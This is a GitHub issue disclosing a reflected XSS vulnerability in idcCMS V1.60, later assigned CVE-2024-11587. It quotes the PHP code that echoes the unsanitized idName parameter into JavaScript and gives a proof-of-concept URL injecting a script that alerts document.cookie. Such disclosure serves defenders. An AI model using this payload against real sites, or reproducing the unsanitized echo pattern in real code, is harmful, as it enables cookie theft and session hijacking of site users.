search

Hebing123 / cve

0 stars 0 forks source link

idcCMS V1.60 has a reflected XSS vulnerability #75

Open Hebing123 opened 1 week ago

Hebing123 commented 1 week ago

Summary

A reflected Cross Site Scripting (XSS) vulnerability exists in idcCMS V1.60 due to improper sanitization of the $idName parameter in /inc/classProvCity.php.

Details

idcCMS V1.60 suffers from a Reflected Cross Site Scripting (XSS) vulnerability due to improper sanitization of the $idName parameter within the GetCityOptionJs method of the ProvCity class. This vulnerability can be exploited by an attacker to inject malicious scripts into the web application, which can then be executed in the browsers of other users.

// ···
class ProvCity{

    // 获取城市数据
    public static function GetDeal(){
        $idName     = trim(@$_GET['idName']);
        $prov       = trim(@$_GET['prov']);

        echo(ProvCity::GetCityOptionJs($idName, $prov, ''));
    }
// ···
    public static function GetCityOptionJs($idName,$prov,$defVal='no'){
        $provArr = self::GetCityArr($prov);

        $retStr = 'document.getElementById("'. $idName .'").options.length=0;';
        if ($defVal != 'no'){
            if (count($provArr) == 0 && strlen($defVal) == 0){
                $retStr .= 'document.getElementById("'. $idName .'").options.add(new Option("请先选择省份",""));';
            }else{
                $retStr .= 'document.getElementById("'. $idName .'").options.add(new Option("'. $defVal .'",""));';
            }
        }
        foreach ($provArr as $val){
            $retStr .= 'document.getElementById("'. $idName .'").options.add(new Option("'. $val .'","'. $val .'"));';
        }
        return $retStr;
    }
}

Proof of Concept (POC)

http://target-ip/read.php?idName=1%3Cscript%3Ealert(document.cookie)%3C/script%3E&mudi=getCityData image

Hebing123 commented 5 days ago

CVE-2024-11587